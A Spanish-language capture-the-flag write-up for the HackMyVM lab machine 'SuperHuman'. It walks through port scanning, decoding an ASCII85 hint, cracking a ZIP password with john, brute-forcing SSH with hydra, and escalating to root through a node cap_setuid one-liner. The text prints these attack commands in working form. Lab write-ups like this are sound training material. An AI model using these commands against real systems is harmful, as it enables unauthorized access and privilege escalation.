cd ~/blog

~/writeups/hmv/054-superhuman.md

054 - SuperHuman

easy Linux hmv 29-03-2024
ASCII85 decoding + hidden ZIPCustom wordlist + SSH brute forceLinux Capabilities Privesc (node cap_setuid)
hackmyvm.eu/machines/machine.php?vm=SuperHuman

~1 min de lectura


Comenzamos con la enumeración de puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.21
 nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.21
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-29 15:34 -03
Nmap scan report for 192.168.1.21
Host is up (0.00029s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 9e:41:5a:43:d8:b3:31:18:0f:2e:32:36:cf:68:c4:b7 (RSA)
|   256 6f:24:81:b4:3d:e5:b9:c8:47:bf:b2:8b:bf:41:2d:51 (ECDSA)
|_  256 49:5f:c0:7a:42:20:76:76:d5:29:1a:65:bf:87:d2:24 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.63 seconds

El código del index.html tiene una pista:

<!-- If your eye was sharper, you would see everything in motion, lol -->

Enumeramos exhaustivamente con gobuster:

 gobuster dir -u 'http://192.168.1.21' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,txt,html,jpg,jpeg,gif,png -r
...
/index.html           (Status: 200) [Size: 658]
/notes-tips.txt       (Status: 200) [Size: 358]
/nietzsche.jpg        (Status: 200) [Size: 22211]
...

notes-tips.txt contiene un mensaje cifrado que identificamos como ASCII85 y decodificamos:

F(&m'D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC/g+jUD'3nBEb-A+De'u)F!,")@:UuC/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@<HBpDImi@/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D>AKYYtEZed5E,T<)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&m'D.R'_DId*=59NN?A8c?5F<G@:Dg*f@$:u@WF`VXIDJsV>AoD^&ATT&:D]j+0G%De1F<G"0A0>i6F<G!7B5_^!+D#e>ASuR'Df-\,ARf.kF(HIc+CoD.-ZgJE@<Q3)D09?%+EMXCEa`Tl/c

salome doesn't want me, I'm so sad... i'm sure god is dead...
I drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.

I must not forget to save it and put a good extension because I don't have much storage.

El mensaje sugiere un archivo salome_and_me con una extensión que ahorre espacio. Fuzzeamos extensiones y damos con un .zip:

 ffuf -u 'http://192.168.1.21/salome_and_me.FUZZ' -w ~/Documentos/wordlists/SecLists/Fuzzing/extensions-most-common.fuzz.txt
...
zip                     [Status: 200, Size: 452, Words: 4, Lines: 1, Duration: 13ms]
...

El ZIP está cifrado; crackeamos con john:

 /opt/john/run/zip2john salome_and_me.zip > hash
ver 2.0 efh 5455 efh 7875 salome_and_me.zip/salome_and_me.txt PKZIP Encr: TS_chk, cmplen=252, decmplen=443, crc=91CF0992 ts=393B cs=393b type=8
 /opt/john/run/john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
turtle           (salome_and_me.zip/salome_and_me.txt)
...

Dentro hay un poema:

 cat salome_and_me.txt
----------------------------------------------------
         GREAT POEM FOR SALOME
----------------------------------------------------
My name is fred,
And tonight I'm sad, lonely and scared,
Because my love Salome prefers schopenhauer, asshole,
I hate him he's stupid, ugly and a peephole,
My darling I offered you a great switch,
And now you reject my love, bitch
I don't give a fuck, I'll go with another lady,
And she'll call me BABY!

Convertimos el poema en un wordlist y hacemos fuerza bruta contra SSH para el usuario fred:

 cat salome_and_me.txt | tr ' ' "\n" | tr '[:upper:]' '[:lower:]' > wordlist.txt
 hydra -l fred -P wordlist.txt 192.168.1.21 ssh -t 64
...
[22][ssh] host: 192.168.1.21   login: fred   password: schopenhauer
...

Al entrar, el comando ls está trampeado para cerrar la conexión, así que usamos dir/cat para movernos y obtenemos la flag:

fred@superhuman:/$ cat /usr/bin/ls
echo "lol"
kill -9 "$(ps --pid $$ -oppid=)"

Para escalar, listamos las capabilities (Linux Capabilities Privesc):

fred@superhuman:/$ /usr/sbin/getcap -r / 2>/dev/null
...
/usr/bin/node = cap_setuid+ep
...

node tiene cap_setuid, que aprovechamos (GTFOBins) para escalar a root:

fred@superhuman:/$ /usr/bin/node -e 'process.setuid(0); require("child_process").spawn("/bin/bash", {stdio: [0, 1, 2]})'
root@superhuman:/#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados